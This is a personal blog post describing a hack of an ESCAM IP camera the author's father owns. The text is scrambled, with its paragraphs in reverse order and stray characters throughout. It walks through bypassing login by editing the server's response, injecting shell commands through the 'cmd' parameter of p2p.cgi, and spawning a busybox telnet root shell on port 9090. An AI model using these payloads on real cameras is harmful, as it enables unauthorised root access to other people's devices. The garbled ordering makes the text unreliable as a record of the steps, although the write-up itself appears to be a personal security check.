![]() This hack was carried out so that I could verify that the camera didn't connect to services outside our network, without us knowing. I hope you found this post interesting, but remember: Don't break into systems you don't own, or have permission to hack on! Linux version 3.0.8 (gcc version 4.4.1 (Hisilicon_v100(gcc4.4-290+uclibc_0.9.32.1+eabi+linuxpthread)) ) #2 Thu Sep 18 00:48:įeatures : swp half thumb fastmult edsp javaįilesystem Size Used Available Use% Mounted on Here's some information about the system that you might find interesting: # cat /proc/version I could simply run telnet 9090, and BOOM! I was in. Injecting the following, /bin/busybox telnetd -l/bin/sh -p 9090 "GET / HTTP/1.1" 200 -įrom there, I started running other commands to explore the file system, and specs of the computer inside.Īfter some poking around, I found out that I could just spawn busybox, and connect to it with telnet, to gain full access to the system as root. Then I went back to the admin panel of the IP camera, and replaced the "cmd" with this (not URL encoded here for clarity): $(wget And then, I watched my Python server receive an incoming request: python -m rver Next, I started a web server on my computer. I replaced the existing "cmd" value with a subshell (%24 is $ url encoded, so it's really $(ls)): /cgi-bin/p2p.cgi?cmd=%24(ls)&-action=get Before long, I noticed a cgi script called "p2p.cgi", that was called with a get parameter "cmd". After turning on intercepting requests and responses, I tried to log in again, and changed check to "1" and authLevel to "255" (which was what I observed would happen after a valid login).Īfter getting access to the admin panel, I started looking for more weaknesses. Without more than the Firefox developer tools, I got a hint, when the response for a failed login attempt was just: var check = "0" Ĭould it really be as simple as changing the response, and setting the authLevel client side? I didn't do any more digging into the (horribly messy) Javascript files, and fired up Burp Suite's proxy instead. It didn't take long before I found the first vulnerability. ![]() Having heard bad things about the security of these cameras before, I wanted to have a look at this one for myself. My father recently got an ESCAM ip camera that he bought on Ebay. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |